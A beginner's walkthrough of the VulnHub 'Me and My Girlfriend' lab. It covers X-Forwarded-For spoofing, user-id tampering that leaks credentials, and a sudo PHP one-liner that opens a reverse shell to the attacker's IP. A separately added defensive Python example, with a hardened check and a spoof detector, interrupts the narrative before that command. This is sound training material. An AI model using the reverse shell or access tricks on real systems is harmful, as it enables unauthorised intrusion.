This is my first writeup, so please forgive my mistakes.
So let's start. I think everybody knows about VulnHub (if anybody doesn't, try exploring this blog: https://medium.com/@gavinloughridge/a-beginners-guide-to-vulnhub-part-1-52b06466635d)
The machine was released on 13 Dec 2019. (Here is the link: https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/)
Difficulty Level: Beginner
Notes: there are 2 flag files
Learning: Web Application | Simple Privilege Escalation
This is a boot to root challenge.
Let us start hacking!
Run this simple command in your terminal: arp-scan --localnet
After that, we see an IP address (192.168.50.138) where my vulnerable VM is running.
I want to know which services are running on that machine. For that I use Nmap.
Here we see that port 80 is open, which means a web service is running.
Just type the IP in your web browser.
When I visit it, it gives me this message. I think it is giving a hint (like only an admin or a local address, such as 127.0.0.1, can access this).
Open the source code (Ctrl+U).
Here it gives another message; I think it may be another hint. When I see x-forwarded-for, I am pretty sure there may be a host header attack possible. To test the host header, I refresh the page and
intercept the traffic in Burp Suite.
After intercepting, I simply added this header:
X-Forwarded-For: localhost
Boom, we got an interesting page 😎😎😎
It looks like a sign-in/sign-up page..😉🤷♂️
Click on the Login tab.
I think there may be SQL injection, so I brute-forced some payloads, but I failed.😢😢
Click on the Register tab.
Here I registered myself in the register area and logged in😜😜
When I see the id parameter in the URL, I think there is some parameter pollution bug, so I change it from 0 to 12. When id=5, it gives me something interesting.🤷♀️🤷♀️
Change id=5 in the URL.
That means there is an existing user at id=5.
Click on profile.
Boom, I got some user details.🤑🤑
In this CTF, if you remember the description, Alice was very important to the scenario. 🚑🚑
Then I remembered that we also had an SSH port open, and I logged in via SSH.
After logging in, I looked for flag1. For that, I used the ls -a command.
The .my_secret folder looks like it has something juicy, so I entered that folder.
BOOM, I found flag1 😎✌🤞🤞, now looking for priv esc👀👀👀👀🐱👤
Now I look for sudo rights. For that, I use this command: sudo -l
Here I see that Alice can run PHP as the root user.
So I run this command:
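The reason that header works is that the page's "local only" check trusts X-Forwarded-For, which any client can set. The following is an added example, not code from this VulnHub machine: the weak check beside a hardened version that only honours the header from a known reverse proxy, plus a small detector for spoofed headers in access logs. The function names, the trusted-proxy address and the log format are assumptions for illustration.

```python
# Added example (not the VulnHub machine's code). Names, the trusted proxy
# address and the one-line log format are assumptions for illustration.
import ipaddress

def _is_loopback_ip(addr):
    """True only for a real loopback IP (127.0.0.0/8 or ::1), never a hostname."""
    try:
        return ipaddress.ip_address(addr.strip()).is_loopback
    except ValueError:
        return False

def vulnerable_is_local(headers, remote_addr):
    """Weak check: believes X-Forwarded-For regardless of the TCP peer and even
    accepts the hostname 'localhost'. The header is client-controlled, so the
    request from the writeup passes although the peer is 192.168.50.128."""
    client = headers.get("X-Forwarded-For", remote_addr).split(",")[0].strip()
    return client.lower() == "localhost" or _is_loopback_ip(client)

def hardened_is_local(headers, remote_addr, trusted_proxies=frozenset()):
    """Use the socket address unless the peer is a known reverse proxy; in that
    case take the address the proxy appended (rightmost), since the leftmost
    entries are whatever the client chose to send. Hostnames never match."""
    forwarded = headers.get("X-Forwarded-For")
    if forwarded and remote_addr in trusted_proxies:
        client = forwarded.split(",")[-1]
    else:
        client = remote_addr
    return _is_loopback_ip(client)

def spoofed_xff_events(log_lines, trusted_proxies=frozenset()):
    """Detection over constructed 'remote_addr xff path' lines ('-' = no header):
    flag requests whose X-Forwarded-For claims loopback/localhost while the
    TCP peer is neither loopback nor a trusted proxy."""
    hits = []
    for line in log_lines:
        remote_addr, xff, path = line.split(maxsplit=2)
        claims_local = xff.lower() == "localhost" or _is_loopback_ip(xff)
        peer_ok = _is_loopback_ip(remote_addr) or remote_addr in trusted_proxies
        if claims_local and not peer_ok:
            hits.append((remote_addr, path))
    return hits

# Constructed sample log: the attacker box from the writeup spoofing the header,
# a legitimate loopback request, and a request via an (assumed) proxy 10.0.0.2.
SAMPLE_LOG = [
    "192.168.50.128 localhost /index.php",
    "192.168.50.128 - /index.php",
    "10.0.0.2 127.0.0.1 /admin",
    "127.0.0.1 - /index.php",
]
```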
sudo /usr/bin/php -r '$sock=fsockopen("192.168.50.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
as well as running netcat listening on port 1234.
BOOM, I got a root shell😎🐱👤🐱👤🐱👤🐱🏍🐱🏍🐱🏍
Now it's time to find flag2😁😁😁😁
So I moved to root, then typed the ls command and found flag2.
Thanks for reading my blog. I hope it will help you😁😁🐱👤🐱👤😎😎